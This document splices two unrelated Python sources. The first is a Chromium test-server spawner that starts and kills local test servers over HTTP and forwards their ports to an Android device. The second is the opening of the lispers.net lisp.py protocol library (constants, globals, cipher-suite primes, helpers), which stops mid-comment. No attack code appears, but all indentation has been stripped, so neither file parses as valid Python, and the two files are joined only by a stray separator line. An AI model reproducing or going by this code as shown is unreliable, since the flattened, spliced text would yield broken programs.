"""A "Test Server Spawner" that handles killing/stopping per-test test servers.
It's used to accept requests from the device to spawn and kill instances of the
chrome test server on the host.
"""
import BaseHTTPServer
import json
import logging
import os
import select
import struct
import subprocess
import threading
import time
import urlparse
import constants
from forwarder import Forwarder
import ports
# Path that are needed to import necessary modules when launching a testserver.
os.environ['PYTHONPATH'] = os.environ.get('PYTHONPATH', '') + (':%s:%s:%s:%s:%s'
% (os.path.join(constants.CHROME_DIR, 'third_party'),
os.path.join(constants.CHROME_DIR, 'third_party', 'tlslite'),
os.path.join(constants.CHROME_DIR, 'third_party', 'pyftpdlib', 'src'),
os.path.join(constants.CHROME_DIR, 'net', 'tools', 'testserver'),
os.path.join(constants.CHROME_DIR, 'sync', 'tools', 'testserver')))
SERVER_TYPES = {
'http': '',
'ftp': '-f',
'sync': '', # Sync uses its own script, and doesn't take a server type arg.
'tcpecho': '--tcp-echo',
'udpecho': '--udp-echo',
}
# The timeout (in seconds) of starting up the Python test server.
TEST_SERVER_STARTUP_TIMEOUT = 10
def _CheckPortStatus(port, expected_status):
"""Returns True if port has expected_status.
Args:
port: the port number.
expected_status: boolean of expected status.
Returns:
Returns True if the status is expected. Otherwise returns False.
"""
for timeout in range(1, 5):
if ports.IsHostPortUsed(port) == expected_status:
return True
time.sleep(timeout)
return False
def _GetServerTypeCommandLine(server_type):
"""Returns the command-line by the given server type.
Args:
server_type: the server type to be used (e.g. 'http').
Returns:
A string containing the command-line argument.
"""
if server_type not in SERVER_TYPES:
raise NotImplementedError('Unknown server type: %s' % server_type)
if server_type == 'udpecho':
raise Exception('Please do not run UDP echo tests because we do not have '
'a UDP forwarder tool.')
return SERVER_TYPES[server_type]
class TestServerThread(threading.Thread):
"""A thread to run the test server in a separate process."""
def __init__(self, ready_event, arguments, adb, tool, build_type):
"""Initialize TestServerThread with the following argument.
Args:
ready_event: event which will be set when the test server is ready.
arguments: dictionary of arguments to run the test server.
adb: instance of AndroidCommands.
tool: instance of runtime error detection tool.
build_type: 'Release' or 'Debug'.
"""
threading.Thread.__init__(self)
self.wait_event = threading.Event()
self.stop_flag = False
self.ready_event = ready_event
self.ready_event.clear()
self.arguments = arguments
self.adb = adb
self.tool = tool
self.test_server_process = None
self.is_ready = False
self.host_port = self.arguments['port']
assert isinstance(self.host_port, int)
self._test_server_forwarder = None
# The forwarder device port now is dynamically allocated.
self.forwarder_device_port = 0
# Anonymous pipe in order to get port info from test server.
self.pipe_in = None
self.pipe_out = None
self.command_line = []
self.build_type = build_type
def _WaitToStartAndGetPortFromTestServer(self):
"""Waits for the Python test server to start and gets the port it is using.
The port information is passed by the Python test server with a pipe given
by self.pipe_out. It is written as a result to |self.host_port|.
Returns:
Whether the port used by the test server was successfully fetched.
"""
assert self.host_port == 0 and self.pipe_out and self.pipe_in
(in_fds, _, _) = select.select([self.pipe_in, ], [], [],
TEST_SERVER_STARTUP_TIMEOUT)
if len(in_fds) == 0:
logging.error('Failed to wait to the Python test server to be started.')
return False
# First read the data length as an unsigned 4-byte value. This
# is _not_ using network byte ordering since the Python test server packs
# size as native byte order and all Chromium platforms so far are
# configured to use little-endian.
# TODO(jnd): Change the Python test server and local_test_server_*.cc to
# use a unified byte order (either big-endian or little-endian).
data_length = os.read(self.pipe_in, struct.calcsize('=L'))
if data_length:
(data_length,) = struct.unpack('=L', data_length)
assert data_length
if not data_length:
logging.error('Failed to get length of server data.')
return False
port_json = os.read(self.pipe_in, data_length)
if not port_json:
logging.error('Failed to get server data.')
return False
logging.info('Got port json data: %s', port_json)
port_json = json.loads(port_json)
if port_json.has_key('port') and isinstance(port_json['port'], int):
self.host_port = port_json['port']
return _CheckPortStatus(self.host_port, True)
logging.error('Failed to get port information from the server data.')
return False
def _GenerateCommandLineArguments(self):
"""Generates the command line to run the test server.
Note that all options are processed by following the definitions in
testserver.py.
"""
if self.command_line:
return
# The following arguments must exist.
type_cmd = _GetServerTypeCommandLine(self.arguments['server-type'])
if type_cmd:
self.command_line.append(type_cmd)
self.command_line.append('--port=%d' % self.host_port)
# Use a pipe to get the port given by the instance of Python test server
# if the test does not specify the port.
if self.host_port == 0:
(self.pipe_in, self.pipe_out) = os.pipe()
self.command_line.append('--startup-pipe=%d' % self.pipe_out)
self.command_line.append('--host=%s' % self.arguments['host'])
data_dir = self.arguments['data-dir'] or 'chrome/test/data'
if not os.path.isabs(data_dir):
data_dir = os.path.join(constants.CHROME_DIR, data_dir)
self.command_line.append('--data-dir=%s' % data_dir)
# The following arguments are optional depending on the individual test.
if self.arguments.has_key('log-to-console'):
self.command_line.append('--log-to-console')
if self.arguments.has_key('auth-token'):
self.command_line.append('--auth-token=%s' % self.arguments['auth-token'])
if self.arguments.has_key('https'):
self.command_line.append('--https')
if self.arguments.has_key('cert-and-key-file'):
self.command_line.append('--cert-and-key-file=%s' % os.path.join(
constants.CHROME_DIR, self.arguments['cert-and-key-file']))
if self.arguments.has_key('ocsp'):
self.command_line.append('--ocsp=%s' % self.arguments['ocsp'])
if self.arguments.has_key('https-record-resume'):
self.command_line.append('--https-record-resume')
if self.arguments.has_key('ssl-client-auth'):
self.command_line.append('--ssl-client-auth')
if self.arguments.has_key('tls-intolerant'):
self.command_line.append('--tls-intolerant=%s' %
self.arguments['tls-intolerant'])
if self.arguments.has_key('ssl-client-ca'):
for ca in self.arguments['ssl-client-ca']:
self.command_line.append('--ssl-client-ca=%s' %
os.path.join(constants.CHROME_DIR, ca))
if self.arguments.has_key('ssl-bulk-cipher'):
for bulk_cipher in self.arguments['ssl-bulk-cipher']:
self.command_line.append('--ssl-bulk-cipher=%s' % bulk_cipher)
def run(self):
logging.info('Start running the thread!')
self.wait_event.clear()
self._GenerateCommandLineArguments()
command = constants.CHROME_DIR
if self.arguments['server-type'] == 'sync':
command = [os.path.join(command, 'sync', 'tools', 'testserver',
'sync_testserver.py')] + self.command_line
else:
command = [os.path.join(command, 'net', 'tools', 'testserver',
'testserver.py')] + self.command_line
logging.info('Running: %s', command)
self.process = subprocess.Popen(command)
if self.process:
if self.pipe_out:
self.is_ready = self._WaitToStartAndGetPortFromTestServer()
else:
self.is_ready = _CheckPortStatus(self.host_port, True)
if self.is_ready:
self._test_server_forwarder = Forwarder(self.adb, self.build_type)
self._test_server_forwarder.Run(
[(0, self.host_port)], self.tool, '127.0.0.1')
# Check whether the forwarder is ready on the device.
self.is_ready = False
device_port = self._test_server_forwarder.DevicePortForHostPort(
self.host_port)
if device_port:
for timeout in range(1, 5):
if ports.IsDevicePortUsed(self.adb, device_port, 'LISTEN'):
self.is_ready = True
self.forwarder_device_port = device_port
break
time.sleep(timeout)
# Wake up the request handler thread.
self.ready_event.set()
# Keep thread running until Stop() gets called.
while not self.stop_flag:
time.sleep(1)
if self.process.poll() is None:
self.process.kill()
if self._test_server_forwarder:
self._test_server_forwarder.Close()
self.process = None
self.is_ready = False
if self.pipe_out:
os.close(self.pipe_in)
os.close(self.pipe_out)
self.pipe_in = None
self.pipe_out = None
logging.info('Test-server has died.')
self.wait_event.set()
def Stop(self):
"""Blocks until the loop has finished.
Note that this must be called in another thread.
"""
if not self.process:
return
self.stop_flag = True
self.wait_event.wait()
class SpawningServerRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
"""A handler used to process http GET/POST request."""
def _SendResponse(self, response_code, response_reason, additional_headers,
contents):
"""Generates a response sent to the client from the provided parameters.
Args:
response_code: number of the response status.
response_reason: string of reason description of the response.
additional_headers: dict of additional headers. Each key is the name of
the header, each value is the content of the header.
contents: string of the contents we want to send to client.
"""
self.send_response(response_code, response_reason)
self.send_header('Content-Type', 'text/html')
# Specify the content-length as without it the http(s) response will not
# be completed properly (and the browser keeps expecting data).
self.send_header('Content-Length', len(contents))
for header_name in additional_headers:
self.send_header(header_name, additional_headers[header_name])
self.end_headers()
self.wfile.write(contents)
self.wfile.flush()
def _StartTestServer(self):
"""Starts the test server thread."""
logging.info('Handling request to spawn a test server.')
content_type = self.headers.getheader('content-type')
if content_type != 'application/json':
raise Exception('Bad content-type for start request.')
content_length = self.headers.getheader('content-length')
if not content_length:
content_length = 0
try:
content_length = int(content_length)
except:
raise Exception('Bad content-length for start request.')
logging.info(content_length)
test_server_argument_json = self.rfile.read(content_length)
logging.info(test_server_argument_json)
assert not self.server.test_server_instance
ready_event = threading.Event()
self.server.test_server_instance = TestServerThread(
ready_event,
json.loads(test_server_argument_json),
self.server.adb,
self.server.tool,
self.server.build_type)
self.server.test_server_instance.setDaemon(True)
self.server.test_server_instance.start()
ready_event.wait()
if self.server.test_server_instance.is_ready:
self._SendResponse(200, 'OK', {}, json.dumps(
{'port': self.server.test_server_instance.forwarder_device_port,
'message': 'started'}))
logging.info('Test server is running on port: %d.',
self.server.test_server_instance.host_port)
else:
self.server.test_server_instance.Stop()
self.server.test_server_instance = None
self._SendResponse(500, 'Test Server Error.', {}, '')
logging.info('Encounter problem during starting a test server.')
def _KillTestServer(self):
"""Stops the test server instance."""
# There should only ever be one test server at a time. This may do the
# wrong thing if we try and start multiple test servers.
if not self.server.test_server_instance:
return
port = self.server.test_server_instance.host_port
logging.info('Handling request to kill a test server on port: %d.', port)
self.server.test_server_instance.Stop()
# Make sure the status of test server is correct before sending response.
if _CheckPortStatus(port, False):
self._SendResponse(200, 'OK', {}, 'killed')
logging.info('Test server on port %d is killed', port)
else:
self._SendResponse(500, 'Test Server Error.', {}, '')
logging.info('Encounter problem during killing a test server.')
self.server.test_server_instance = None
def do_POST(self):
parsed_path = urlparse.urlparse(self.path)
action = parsed_path.path
logging.info('Action for POST method is: %s.', action)
if action == '/start':
self._StartTestServer()
else:
self._SendResponse(400, 'Unknown request.', {}, '')
logging.info('Encounter unknown request: %s.', action)
def do_GET(self):
parsed_path = urlparse.urlparse(self.path)
action = parsed_path.path
params = urlparse.parse_qs(parsed_path.query, keep_blank_values=1)
logging.info('Action for GET method is: %s.', action)
for param in params:
logging.info('%s=%s', param, params[param][0])
if action == '/kill':
self._KillTestServer()
elif action == '/ping':
# The ping handler is used to check whether the spawner server is ready
# to serve the requests. We don't need to test the status of the test
# server when handling ping request.
self._SendResponse(200, 'OK', {}, 'ready')
logging.info('Handled ping request and sent response.')
else:
self._SendResponse(400, 'Unknown request', {}, '')
logging.info('Encounter unknown request: %s.', action)
class SpawningServer(object):
"""The class used to start/stop a http server."""
def __init__(self, test_server_spawner_port, adb, tool, build_type):
logging.info('Creating new spawner on port: %d.', test_server_spawner_port)
self.server = BaseHTTPServer.HTTPServer(('', test_server_spawner_port),
SpawningServerRequestHandler)
self.port = test_server_spawner_port
self.server.adb = adb
self.server.tool = tool
self.server.test_server_instance = None
self.server.build_type = build_type
def _Listen(self):
logging.info('Starting test server spawner')
self.server.serve_forever()
def Start(self):
"""Starts the test server spawner."""
listener_thread = threading.Thread(target=self._Listen)
listener_thread.setDaemon(True)
listener_thread.start()
time.sleep(1)
def Stop(self):
"""Stops the test server spawner.
Also cleans the server state.
"""
self.CleanupState()
self.server.shutdown()
def CleanupState(self):
"""Cleans up the spawning server state.
This should be called if the test server spawner is reused,
to avoid sharing the test server instance.
"""
if self.server.test_server_instance:
self.server.test_server_instance.Stop()
self.server.test_server_instance = None
|
lisp.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import Queue
import traceback
from Crypto.Cipher import AES
import ecdsa
import json
import commands
import copy
import chacha
import poly1305
from geopy.distance import vincenty
import curve25519
use_chacha = (os.getenv("LISP_USE_CHACHA") != None)
use_poly = (os.getenv("LISP_USE_POLY") != None)
#
# For printing the lisp_rloc_probe_list{}.
#
lisp_print_rloc_probe_list = False
#------------------------------------------------------------------------------
#
# Global variables.
#
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True
lisp_map_notify_queue = {} # Key is concat of nonce and etr address
lisp_map_servers_list = {} # Key is ms-name/address string, value lisp_ms()
lisp_ddt_map_requestQ = {}
lisp_db_list = [] # Elements are class lisp_mapping()
lisp_group_mapping_list = {} # Elements are class lisp_group_mapping()
lisp_map_resolvers_list = {} # Key is mr-name/address string, value lisp_mr()
lisp_rtr_list = {} # Key is address string, value is lisp_address()
lisp_elp_list = {}
lisp_rle_list = {}
lisp_geo_list = {}
lisp_json_list = {}
lisp_myrlocs = [None, None, None]
lisp_mymacs = {}
#
# Used for multi-tenancy. First dictionary array is indexed by device name
# and second one has value lisp_interface() indexed by a instance-id string.
#
lisp_myinterfaces = {}
lisp_iid_to_interface = {}
lisp_multi_tenant_interfaces = []
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None
#
# Stats variables.
#
lisp_registered_count = 0
#
# For tracking Map-Requesters behind NAT devices.
#
lisp_info_sources_by_address = {}
lisp_info_sources_by_nonce = {}
#
# Store computed keys per RLOC. The key is the nonce from the Map-Request
# at the time creates the g, p, and public-key values. The value is an
# array of 4 elements, indexed by key-id.
#
lisp_crypto_keys_by_nonce = {}
lisp_crypto_keys_by_rloc_encap = {} # Key is "<rloc>:<port>" tuple
lisp_crypto_keys_by_rloc_decap = {} # Key is "<rloc>:<port>" tuple
lisp_data_plane_security = False
lisp_search_decap_keys = True
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False
#
# When NAT-traversal is enabled and lisp-crypto is enabled, an ITR needs
# to send RLOC-probe requests with an ephemeral port that is also used
# for data encapsulation to the RTR. This way the RTR can find the crypto
# key when multiple xTRs are behind the same NAT.
#
lisp_crypto_ephem_port = None
#
# Is the lisp-itr process running as a PITR?
#
lisp_pitr = False
#
# Are we listening on all MAC frames?
#
lisp_l2_overlay = False
#
# RLOC-probing variables. And for NAT-traversal, register only reachable
# RTRs which is determined from the lisp_rloc_probe_list.
#
lisp_rloc_probing = False
lisp_rloc_probe_list = {}
#
# Command "lisp xtr-parameters" register-reachabile-rtrs has opposite polarity
# to lisp_register_all_rtrs. So by default we do not consider RLOC-probing
# reachability status in registering RTRs to the mapping system.
#
lisp_register_all_rtrs = True
#
# Nonce Echo variables.
#
lisp_nonce_echoing = False
lisp_nonce_echo_list = {}
#
# xTR configuration parameters.
#
lisp_nat_traversal = False
#
# xTR configuration parameters. This flag is used to indicate that when a
# map-cache entry is created or updated, that we write specific information
# to say a Broadcom chip, that will do VXLAN encapsulation. This is a way
# to get existing hardware to do L3 overlays with the LISP control-plane
# when all it supports is VXLAN. See lisp_program_vxlan_hardware()
#
lisp_program_hardware = False
#
# Should we write to the lisp.checkpoint file.
#
lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"
#
# Should we write map-cache entries to a named socket for another data-plane?
#
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"
#
# This lock is used so the lisp-core process doesn't intermix command
# processing data with show data and packet data.
#
lisp_ipc_lock = None
#
# Use this as a default instance-ID when there are no "lisp interface" commands
# configured. This default instance-ID is taken from the first database-mapping
# command.
#
lisp_default_iid = 0
lisp_default_secondary_iid = 0
#
# Configured list of RTRs that the lisp-core process will insert into
# Info-Reply messages.
#
lisp_ms_rtr_list = [] # Array of type lisp.lisp_address()
#
# Used in an RTR to store a translated port for a translated RLOC. Key is
# hostname that is sent in a Info-Request is a nested array. See
# lisp_store_nat_info() for details.
#
lisp_nat_state_info = {}
#
# Used for doing global rate-limiting of Map-Requests. When the process
# starts up or the map-cache is cleared by user we don't do rate-limiting for
# 1 minute so we can load up the cache quicker.
#
lisp_last_map_request_sent = None
lisp_no_map_request_rate_limit = time.time()
#
# Used for doing global rate-limiting of ICMP Too Big messages.
#
lisp_last_icmp_too_big_sent = 0
#
# Array to store 1000 flows.
#
LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = []
#
# Store configured or API added policy parameters.
#
lisp_policies = {}
#
# Load-split pings. We'll has the first long of a ICMP echo-request and
# echo-reply for testing purposes. To show per packet load-splitting.
#
lisp_load_split_pings = False
#
# This array is a configured list of IPv6-prefixes that define what part
# of a matching address is used as the crypto-hash. They must be on 4-bit
# boundaries for easy matching.
#
lisp_eid_hashes = []
#
# IPv4 reassembly buffer. We pcapture IPv4 fragments. They can come to the ETR
# when IPv6 is encapsulated in IPv4 and we have an MTU violation for the
# encapsulated packet. The array is index by the IPv4 ident field and contains
# an array of packet buffers. Once all fragments have arrived, the IP header
# is removed from all fragments except the first one.
#
lisp_reassembly_queue = {}
#
# Map-Server pubsub cache. Remember Map-Requesters that set the N-bit for
# a EID target it is requesting. Key is EID-prefix in string format with
# bracketed instance-ID included in slash format. The value of the dictionary
# array is a dictionary array of ITR addresses in string format.
#
lisp_pubsub_cache = {}
#
# When "decentralized-push-xtr = yes" is configured, the xTR is also running as
# a Map-Server and Map-Resolver. So Map-Register messages the ETR sends is
# looped back to the lisp-ms process.
#
lisp_decent_push_configured = False
#
# When "decentralized-pull-xtr-[modulus,dns-suffix] is configured, the xTR is
# also running as a Map-Server and Map-Resolver. So Map-Register messages the
# ETR sends is looped back to the lisp-ms process.
#
lisp_decent_modulus = 0
lisp_decent_dns_suffix = None
#
# lisp.lisp_ipc_socket is used by the lisp-itr process during RLOC-probing
# to send the lisp-etr process status about RTRs learned. This is part of
# NAT-traversal support.
#
lisp_ipc_socket = None
#
# Configured in the "lisp encryption-keys" command.
#
lisp_ms_encryption_keys = {}
lisp_ms_json_keys = {}
#
# Used to stare NAT translated address state in an RTR when a ltr client
# is sending RLOC-based LISP-Trace messages. If the RTR encounters any
# LISP-Trace error proessing called from lisp_rtr_data_plane() then it
# can return a partially filled LISP-Trace packet to the ltr client that
# site behind a NAT device.
#
# Dictiionary array format is:
# key = self.local_addr + ":" + self.local_port
# lisp_rtr_nat_trace_cache[key] = (translated_rloc, translated_port)
#
# And the array elements are added in lisp_trace.rtr_cache_nat_trace().
#
lisp_rtr_nat_trace_cache = {}
#
# Configured glean mappings. The data structure is an array of dictionary
# arrays with keywords "eid-prefix", "group-prefix", "rloc-prefix", and
# "instance-id". If keywords are not in dictionary array, the value is
# wildcarded. The values eid-prefix, group-prefix and rloc-prefix is
# lisp_address() so longest match lookups can be performed. The instance-id
# value is an array of 2 elements that store same value in both elements if
# not a range or the low and high range values.
#
lisp_glean_mappings = []
#
# Gleaned groups data structure. Used to find all (S,G) and (*,G) the gleaned
# EID has joined. This data structure will be used to time out entries that
# have stopped joining. In which case, the RLE is removed from the (S,G) or
# (*,G) that join timed out.
#
# The dictionary array is indexed by "[<iid>]<eid>" and the value field is a
# dictoinary array indexed by group address string. The value of the nested
# dictionay array is a timestamp. When EID 1.1.1.1 has joined groups 224.1.1.1,
# and 224.2.2.2, here is how timestamp 1111 and 2222 are stored.
#
# >>> lisp_gleaned_groups = {}
# >>> lisp_gleaned_groups["[1539]1.1.1.1"] = {}
# >>> lisp_gleaned_groups["[1539]1.1.1.1"]["224.1.1.1"] = 1111
# >>> lisp_gleaned_groups["[1539]1.1.1.1"]["224.2.2.2"] = 2222
# >>> lisp_gleaned_groups
# {'[1539]1.1.1.1': {'224.2.2.2': 2222, '224.1.1.1': 1111}}
#
lisp_gleaned_groups = {}
#
# Use this socket for all ICMP Too-Big messages sent by any process. We are
# centralizing it here.
#
lisp_icmp_raw_socket = None
if (os.getenv("LISP_SEND_ICMP_TOO_BIG") != None):
lisp_icmp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.IPPROTO_ICMP)
lisp_icmp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
#endif
lisp_ignore_df_bit = (os.getenv("LISP_IGNORE_DF_BIT") != None)
#------------------------------------------------------------------------------
#
# UDP ports used by LISP.
#
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434
#
# Packet type definitions.
#
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9
#
# Map-Reply action values.
#
LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5
lisp_map_reply_action_string = ["no-action", "native-forward",
"send-map-request", "drop-action", "policy-denied", "auth-failure" ]
#
# Various HMACs alg-ids and lengths (in bytes) used by LISP.
#
LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32
#
# LCAF types as defined in draft-ietf-lisp-lcaf.
#
LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16
#
# TTL constant definitions.
#
LISP_MR_TTL = (24*60)
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_GLEAN_TTL = 15
LISP_MCAST_TTL = 15
LISP_IGMP_TTL = 240
LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds, 1 minute
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds, 1 minute
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds, 1 minute
LISP_TEST_MR_INTERVAL = 60 # In units of seconds, 1 minute
LISP_MAP_NOTIFY_INTERVAL = 2 # In units of seconds
LISP_DDT_MAP_REQUEST_INTERVAL = 2 # In units of seconds
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15 # In units of seconds
LISP_MAP_REQUEST_RATE_LIMIT = .5 # In units of seconds, 500 ms
LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME = 60 # In units of seconds, 1 minute
LISP_ICMP_TOO_BIG_RATE_LIMIT = 1 # In units of seconds
#LISP_RLOC_PROBE_TTL = 255
LISP_RLOC_PROBE_TTL = 128
LISP_RLOC_PROBE_INTERVAL = 10 # In units of seconds
LISP_RLOC_PROBE_REPLY_WAIT = 15 # In units of seconds
LISP_DEFAULT_DYN_EID_TIMEOUT = 15 # In units of seconds
LISP_NONCE_ECHO_INTERVAL = 10
LISP_IGMP_TIMEOUT_INTERVAL = 180 # In units of seconds, 3 minutes
#
# Cipher Suites defined in RFC 8061:
#
# Cipher Suite 0:
# Reserved
#
# Cipher Suite 1 (LISP_2048MODP_AES128_CBC_SHA256):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 2 (LISP_EC25519_AES128_CBC_SHA256):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 3 (LISP_2048MODP_AES128_GCM):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 4 (LISP_3072MODP_AES128_GCM):
# Diffie-Hellman Group: 3072-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 5 (LISP_256_EC25519_AES128_GCM):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 6 (LISP_256_EC25519_CHACHA20_POLY1305):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: Chacha20-Poly1305 [CHACHA-POLY] [RFC7539]
# Integrity: Integrated with AEAD_CHACHA20_POLY1305 [CHACHA-POLY]
# IV length: 8 bytes
# KDF: HMAC-SHA-256
#
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3
LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF
LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
#------------------------------------------------------------------------------
#
# lisp_record_traceback
#
# Open ./logs/lisp-traceback.log file and write traceback info to it.
#
def lisp_record_traceback(*args):
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
fd = open("./logs/lisp-traceback.log", "a")
fd.write("---------- Exception occurred: {} ----------\n".format(ts))
try:
traceback.print_last(file=fd)
except:
fd.write("traceback.print_last(file=fd) failed")
#endtry
try:
traceback.print_last()
except:
print("traceback.print_last() failed")
#endtry
fd.close()
return
#enddef
#
# lisp_set_exception
#
# Set exception callback to call lisp.lisp_record_traceback().
#
def lisp_set_exception():
sys.excepthook = lisp_record_traceback
return
#enddef
#
# lisp_is_raspbian
#
# Return True if this system is running Raspbian on a Raspberry Pi machine.
#
def lisp_is_raspbian():
if (platform.dist()[0] != "debian"): return(False)
return(platform.machine() in ["armv6l", "armv7l"])
#enddef
#
# lisp_is_ubuntu
#
# Return True if this system is running Ubuntu Linux.
#
def lisp_is_ubuntu():
return(platform.dist()[0] == "Ubuntu")
#enddef
#
# lisp_is_fedora
#
